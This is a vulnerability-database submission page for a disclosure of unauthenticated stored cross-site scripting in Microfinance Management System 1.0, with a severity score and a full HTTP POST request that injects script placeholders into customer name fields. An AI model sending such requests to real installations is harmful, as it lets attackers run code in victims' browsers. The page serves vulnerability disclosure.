إرسال #33222: Microfinance Management System 1.0 - Cross-site scripting stored (unauthenticated)المعلومات

عنوانMicrofinance Management System 1.0 - Cross-site scripting stored (unauthenticated)
الوصف# Exploit Title: Microfinance Management System 1.0 - Cross-site scripting stored (unauthenticated) # Date: 23/03/2022 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/14822/microfinance-management-system.html # Version: 1.0 # Tested on: Linux Title: ================ Microfinance Management System 1.0 - Cross-site scripting stored (unauthenticated) Summary: ================ Microfinance Management System version 1.0 is affected by the Cross-site Scripting vulnerability due to poor hygiene in certain parameters. The attacker could take advantage of this flaw to inject arbitrary javascript code to manipulate the victim's browser capabilities. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N Affected Product: ================ Microfinance Management System v1.0 Steps to Reproduce: ================ 1. Open a request repeater (like Burp Suite) and send this request: POST /mims/app/addcustomerHandler.php HTTP/1.1 Host: target.com Content-Length: 310 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://target.com/mims/addcustomer.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close customer_number=335341988&customer_type=14465108&first_name=<XSS PAYLOAD HERE>&middle_name=<XSS PAYLOAD HERE>&surname=<XSS PAYLOAD HERE>&nationality=Tanzanian&date_of_birth=2000-01-01&gender=O&addcustomer= You can find your XSS payload in the /mims/managecustomer.php endpoint.
المصدر⚠️ https://www.sourcecodester.com/php/14822/microfinance-management-system.html?a
المستخدم
 mrempy (UID 24379)
ارسال23/03/2022 04:02 PM (4 سنوات منذ)
الاعتدال24/03/2022 01:15 AM (9 hours later)
الحالةتمت الموافقة
إدخال VulDB195640 [SourceCodester Microfinance Management System 1.0 addcustomerHandler.php first_name/middle_name/surname البرمجة عبر المواقع]
النقاط20

التالي نظرة عامة السابق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!